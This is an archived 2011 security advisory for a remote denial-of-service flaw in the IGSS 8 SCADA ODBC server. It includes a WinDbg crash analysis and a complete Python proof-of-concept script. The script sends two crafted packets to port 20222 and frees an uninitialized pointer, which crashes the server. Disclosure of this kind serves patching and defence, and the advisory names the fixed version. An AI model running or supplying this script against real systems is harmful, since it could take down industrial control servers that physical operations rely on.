IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS

2011-03-23T00:00:00
ID SECURITYVULNS:DOC:25990
Type securityvulns
Reporter Securityvulns
Modified 2011-03-23T00:00:00

Description

!/usr/bin/python

igss.py

IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS

Jeremy Brown / jbrown at patchtuesday dot org

Mar 2011

There are multiple remote uninitialized pointer free conditions in IGSS's ODBC

server. By sending a specially crafted packet to listening port 20222, it is

possible to crash the server. Execution of arbitrary code is unlikely.

Note: IGSS uses a 3rd party ODBC driver kit from Dr. DeeBee.

HEAP[Odbcixv8se.exe]: Invalid allocation size - 8899AABB (exceeded 7ffdefff)

HEAP[Odbcixv8se.exe]: Invalid Address specified to RtlGetUserInfoHeap( 00150000, 00175008 )

(f10.cf8): Break instruction exception - code 80000003 (first chance)

eax=00175000 ebx=00175000 ecx=7c91ead5 edx=0102fc55 esi=00150000 edi=00175008

eip=7c90120e esp=0102fe58 ebp=0102fe5c iopl=0 nv up ei pl nz na po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202

ntdll!DbgBreakPoint:

7c90120e cc int 3

0:002> g

HEAP[Odbcixv8se.exe]: Invalid Address specified to RtlGetUserInfoHeap( 00150000, 00175008 )

(f10.cf8): Break instruction exception - code 80000003 (first chance)

eax=00175000 ebx=00175000 ecx=7c91ead5 edx=0102fc55 esi=00150000 edi=00175008

eip=7c90120e esp=0102fe58 ebp=0102fe5c iopl=0 nv up ei pl nz na po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202

ntdll!DbgBreakPoint:

7c90120e cc int 3

0:002> g

Heap corruption detected at 00175008

Heap corruption detected at 00177F78

Heap corruption detected at 001733D8

(f10.cf8): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=00173398 ebx=00000000 ecx=feeefeee edx=001733d8 esi=00173390 edi=00150000

eip=7c9276fc esp=0102fc34 ebp=0102fd08 iopl=0 nv up ei pl zr na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246

ntdll!RtlFreeHeapSlowly+0x392:

7c9276fc 8901 mov dword ptr [ecx],eax ds:0023:feeefeee=????????

0:002> kb

ChildEBP RetAddr Args to Child

0102fd08 7c96f85a 00150000 50000061 00173398 ntdll!RtlFreeHeapSlowly+0x392

0102fd7c 7c94bc4c 00150000 50000061 00173398 ntdll!RtlDebugFreeHeap+0x193

0102fe64 7c927573 00150000 40000061 00173398 ntdll!RtlFreeHeapSlowly+0x37

0102ff34 7c80fd4f 00150000 00000001 00173398 ntdll!RtlFreeHeap+0xf9

*** ERROR: Module load completed but symbols could not be loaded for Odbcixv8se.exe

0102ff7c 0044531d 00aa001c 0102ffb4 00443abd kernel32!GlobalFree+0xb5

WARNING: Stack unwind information not available. Following frames may be wrong.

0102ff88 00443abd 00173398 00000014 00000016 Odbcixv8se+0x4531d

0102ffb4 7c80b729 00000710 00000000 00000000 Odbcixv8se+0x43abd

0102ffec 00000000 004436f0 00000710 00000000 kernel32!BaseThreadStart+0x37

feeefeee = freed memory

RtlFreeHeap() takes three arguments:

HeapHandle --> 0x173398

Flags --> 0x00000001

HeapBase --> 0x173398

HeapBase is the pointer to the memory block that is going to be freed.

0:002> dd 173398

00173398 001733d8 -----------------------------

001733a8 feeefeee feeefeee feeefeee feeefeee -

001733b8 feeefeee feeefeee feeefeee feeefeee -

001733c8 feeefeee feeefeee feeefeee feeefeee -

001733d8 feeefeee feeefeee feeefeee feeefeee <-

001733e8 feeefeee feeefeee feeefeee feeefeee

001733f8 feeefeee feeefeee feeefeee feeefeee

00173408 feeefeee feeefeee feeefeee feeefeee

In this example, the pointer to free happens to point to free memory.

Tested IGSS 8 (Odbcixv8se.exe version 10299) on Windows

Fixed version: IGSS 8 (Odbcixv8se.exe version 11003)

http://www.syware.com/download/drdeebee/gold_bug.txt

import sys import socket

req_1=( "\x00\x00\x00\x34" "\x02\x00\x00\x00\x02\x00\x00\x00\x02\x2e\x00\x00\x00\x00\x19\x49" "\x47\x53\x53\x33\x32\x76\x38\x20\x4f\x44\x42\x43\x20\x4e\x65\x74" "\x77\x6f\x72\x6b\x20\x44\x53\x00\x00\x00\x00\x02\x20\x00\x00\x00" "\x00\x02\x20\x00" )

req_2=( "\x00\x00\x00\xff"+ # length "\x16"+ # switch code "\x77" * 254+ # begin query here "\x88\x99\xaa\xbb" # test )

if len(sys.argv)!=2: print "Usage: %s <target>" % sys.argv[0] sys.exit(0)

target=sys.argv[1] port=20222 cs=target,port

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect(cs) sock.settimeout(1)

sock.send(req_1)

try: resp=sock.recv(1024) print "resp_1 = %s\n"%resp.encode("hex") except: pass

sock.send(req_2)

try: resp=sock.recv(1024) print "resp_2 = %s\n"%resp.encode("hex") except: pass

sock.close()